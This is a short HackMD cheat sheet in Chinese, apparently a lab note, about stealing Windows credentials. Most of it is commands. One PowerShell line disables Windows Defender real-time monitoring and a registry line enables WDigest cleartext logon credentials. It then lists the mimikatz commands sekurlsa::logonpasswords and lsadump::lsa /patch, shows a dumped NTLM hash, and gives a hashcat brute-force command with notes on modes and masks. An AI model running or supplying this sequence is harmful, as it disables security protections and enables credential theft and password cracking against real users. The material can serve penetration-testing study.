mimikatz - HackMD

# mimikatz ## 關閉windows defender ### powershell ```Set-MpPreference -DisableRealtimeMonitoring $true``` ### cmd ```reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f``` ## 偷密碼 mimikatz #### ```privilege::debug``` ![](https://i.imgur.com/en7noGO.png) #### ```sekurlsa::logonpasswords``` #### ```lsadump::lsa /patch``` RID : 000003e9 (1001) User : kddc_vm LM : NTLM : dbfd778b784ffbf91556c5fb1a96fd5c ![](https://i.imgur.com/KXV9Hrj.png) ## 破解 NTLM ```hashcat -m 1000 -a 3 win_user_NTLM --session win_user_ntlm_seesion``` ![](https://i.imgur.com/hN0mqbf.png) ``` -m 指定模式 1000为ntlm v1 5600位ntlm v2 -a 指定破解模式 0位字典破解然后后面为ntlm hash和字典 ``` ?l 代表小写字母 ?u 代表大写字母 ?d 代表数字 ?s 代表特殊字符 ?a 代表大小写字母、数字以及特殊字符 ?b 0x00-0xff ``` ``` 0 straight 字典破解 1 combination 将字典中密码进行组合（1 2 ——> 11 22 12 21） 3 brute-force 使用指定掩码破解 6 Hybrid Wordlist + Mask 字典+掩码破解 7 Hybrid Mask + Wordlist 掩码+字典破解 ``` ![](https://i.imgur.com/fybONPT.png) ``` ## 待學習 https://wooyun.js.org/drops/Mimikatz%20%E9%9D%9E%E5%AE%98%E6%96%B9%E6%8C%87%E5%8D%97%E5%92%8C%E5%91%BD%E4%BB%A4%E5%8F%82%E8%80%83_Part3.html